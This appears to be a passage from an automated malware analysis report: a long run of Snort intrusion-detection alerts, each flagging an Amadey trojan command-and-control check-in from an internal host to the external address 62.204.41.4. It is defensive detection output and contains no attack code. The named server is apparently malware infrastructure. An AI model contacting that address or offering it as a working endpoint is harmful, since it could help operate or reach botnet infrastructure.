                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49950 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49952 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49953 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49954 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49955 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49956 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49957 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49958 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49959 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49960 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49961 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49962 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49963 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49964 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49965 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49966 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49967 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49968 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49969 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49970 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49971 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49972 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49973 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49974 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49975 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49976 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49977 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49978 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49979 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49980 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49981 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49982 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49983 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49984 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49985 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49986 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49987 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49988 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49989 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49990 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49991 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49992 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49993 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49994 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49995 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49996 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49997 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49998 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49999 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50000 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50001 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50002 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50003 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50004 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50005 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50006 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50007 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50008 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50009 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50010 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50011 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50012 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50013 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50014 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50015 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50016 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50017 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50018 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50019 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50020 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50021 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50022 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50023 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50024 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50025 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50026 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50027 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50028 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50029 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50030 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50031 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50032 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50033 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50034 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50035 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50036 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50037 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50038 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50039 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50040 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50041 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50042 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50043 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50044 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50045 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50046 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50047 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50048 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50049 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50050 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50051 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50052 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50053 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50054 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50055 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50056 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50057 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50058 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50059 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50060 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50061 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50062 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50063 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50064 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50065 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50066 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50067 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50068 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50069 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50070 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50071 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50072 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50073 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50074 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50075 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50076 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50077 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50078 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50079 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50080 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50081 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50082 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50083 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50084 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50085 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50086 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50087 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50088 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50089 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50090 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50091 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50092 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50093 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50094 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50095 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50096 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50097 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50098 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50099 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50100 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50101 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50102 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50103 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50104 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50105 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50106 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50107 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50108 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50109 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50110 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50111 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50112 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50113 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50114 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50115 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50116 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50117 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50118 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50119 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50120 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50121 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50122 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50123 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50124 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50125 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50126 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50127 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50128 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50129 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50130 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50131 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50132 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50133 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50134 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50135 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50136 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50137 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50138 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50139 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50140 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50141 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50142 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50143 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50144 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50145 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50146 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50147 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50148 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50149 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50150 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50151 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50152 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50153 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50154 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50155 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50156 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50157 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50158 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50159 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50160 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50161 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50162 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50163 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50164 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50165 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50166 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50167 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50168 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50169 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50170 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50171 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50172 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50173 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50174 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50175 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50176 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50177 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50178 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50179 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50180 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50181 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50182 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50183 -> 62.204.41.4:80
